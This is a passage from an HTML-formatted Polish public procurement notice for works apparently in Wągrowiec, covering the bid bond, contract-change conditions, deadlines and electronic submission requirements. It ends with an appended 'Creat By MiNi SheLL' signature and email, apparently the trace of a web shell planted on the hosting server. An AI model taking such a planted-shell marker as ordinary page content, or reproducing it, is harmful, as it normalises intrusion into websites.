uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania <br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie <br/>do dysponowania tymi osobami – załącznik nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> ROZDZIAŁ 27. WADIUM <br/>1. Zamawiający wymaga wniesienia wadium w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100). <br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu <br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy. <br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>1) pieniądzu; <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 poz. 419). <br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr: 69 8959 0001 0000 5106 2000 <br/>0060. <br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu oryginał <br/>gwarancji lub poręczenia, w postaci elektronicznej. <br/>W przypadku Wykonawców składających ofertę wspólną (np. w formie konsorcjum lub spółki cywilnej), treść <br/>dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego, co oznacza, że <br/>uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki <br/>zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy, tj.: działania lub zaniechania wszystkich <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niezbędne jest wymienienie wszystkich <br/>Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego (jako Stron bankowej lub <br/>ubezpieczeniowej gwarancji wadialnej, poręczenia wadialnego) albo przynajmniej zasygnalizowanie, że Strona <br/>stosunku gwarancyjnego jest liderem/jednym z uczestników konsorcjum/współwłaścicielem spółki cywilnej - działającym także w imieniu i na rzecz innych uczestników jako Wykonawców (przy sugerowanym wymienieniu <br/>wszystkich wspólników/członków/itp.). <br/>6. Z treści gwarancji/poręczenia musi wynikać bezwarunkowe i nieodwołalne zobowiązanie gwaranta/poręczyciela <br/>do wypłaty Zamawiającemu pełnej kwoty wadium, na każde pisemne żądanie zgłoszone przez Zamawiającego, <br/>w okolicznościach określonych w art. 98 ust. 6 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwe są istotne zmiany umowy polegające na przedłużeniu terminu jej wykonania, jeżeli niemożność <br/>dotrzymania pierwotnego terminu stanowi konsekwencję: <br/>1) <br/>zmian do umowy na podstawie art. 455 ust. 1 pkt 3 i 4 oraz art. 455 ust. 2 ustawy Prawo zamówień <br/>publicznych lub robót zamiennych, <br/>2) <br/>przyczyn zależnych od Zamawiającego, Organów Administracji, innych osób lub podmiotów, za których <br/>działania nie odpowiada Wykonawca <br/>3) <br/>siły wyższej lub warunków atmosferycznych nie pozwalających na realizację robót, dla których określona <br/>odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych, <br/>4) wystąpienia w trakcie prowadzenia robót klęsk żywiołowych, <br/>5) wprowadzenia w trakcie prowadzenia robót stanu wyjątkowego, stanu zagrożenia epidemicznego, stanu <br/>epidemii lub innego stanu wyjątkowego (wprowadzającego nowe prawa i obowiązki na obywatelach) <br/>nieprzewidzianego w momencie odpisania niniejszej umowy stanu na terenie kraju lub minimum na terenie <br/>miasta Wągrowiec <br/>6) zmian spowodowanych warunkami geologicznymi, terenowymi (w szczególności przebiegiem urządzeń <br/>podziemnych, instalacji lub obiektów infrastrukturalnych), archeologicznymi, wodnymi itp., odmiennymi od <br/>przyjętych w dokumentacji projektowej wystąpią okoliczności spowodowane nieprzywidzianymi warunkami <br/>archeologicznymi, geologicznymi, geotechnicznymi, które spowodowały niezawinione i niemożliwe <br/>do uniknięcia przez wykonawcę opóźnienia, a w szczególności: <br/>7) natrafienia w trakcie prowadzenia robót na niewypały i niewybuchy, <br/>8) konieczności wykonania wykopalisk archeologicznych; <br/>9) wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych, <br/>10) wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, <br/>w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych <br/>lub podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;<br/>11) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie robót <br/>budowlanych zgodnie z przyjętą technologią lub spełnienie wymogów technologicznych, udokumentowanych <br/>w dzienniku budowy i potwierdzonych wyciągiem (raportem) z zapisów danych pogodowych Instytutu <br/>Meteorologii i Gospodarki Wodnej - pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły <br/>zostać zrealizowane; <br/>Z uwagi na ograniczoną liczbę znaków - Szczegóły są zawarte w projektowanych postanowieniach umowy - załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1148347</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-20 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. pkt 3.6) Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej: <br/>11. Zgodnie z § 11 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu <br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz <br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz <br/>zgodnie z art. 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy: <br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub <br/>jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux, lub ich nowsze <br/>wersje, <br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja <br/>10 0., <br/>4) włączona obsługa JavaScript, <br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, <br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8, <br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) <br/>generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. <br/>12. Wykonawca może dołączyć maksymalnie 10 załączników (jest to suma plików dodanych w obu punktach: <br/>Oferta/Wniosek Wykonawcy oraz Tajemnica przedsiębiorstwa), o maksymalnym rozmiarze 150MB każdy, <br/>natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. <br/>13. Zamawiający nie ponosi odpowiedzialności z tytułu nieotrzymania przez Wykonawcę informacji związanych <br/>z prowadzonym postępowaniem, w przypadku wskazania przez Wykonawcę w ofercie np. błędnego adresu <br/>poczty elektronicznej. <br/>14. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia: akceptuje warunki korzystania <br/>z <br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem <br/>w zakładce „Regulamin&#34; oraz uznaje go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków <br/>dostępnej na stronie https://platformazakupowa.pl <br/>15. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania <br/>z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed <br/>upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka <br/>oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę <br/>w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek zawarty w art. 221 ustawy Pzp. <br/>16. Informacje o sposobie komunikowania się Zamawiającego z Wykonawcami w inny sposób niż przy użyciu <br/>środków komunikacji elektronicznej, w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 <br/>i art. 69 Ustawy Pzp – Zamawiający nie przewiduje. <br/>17. Ze strony Zamawiającego osoby uprawnione do kontaktu: Weronika Zdrzałka, tel. 67 268 03 06 <br/>18. Zaleca się, aby komunikacja odbywała się tylko na Platformie za pośrednictwem formularza „Wyślij wiadomość <br/>do zamawiającego”, nie za pośrednictwem kontaktu telefonicznego.<br/><br/>UWAGA: Z postępowania o udzielenie zamówienia wyklucza się wykonawcę na podstawie art. 7 ust. 1 ustawy z 13.04.2022<br/> r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/> bezpieczeństwa narodowego

Creat By MiNi SheLL
Email: jattceo@gmail.com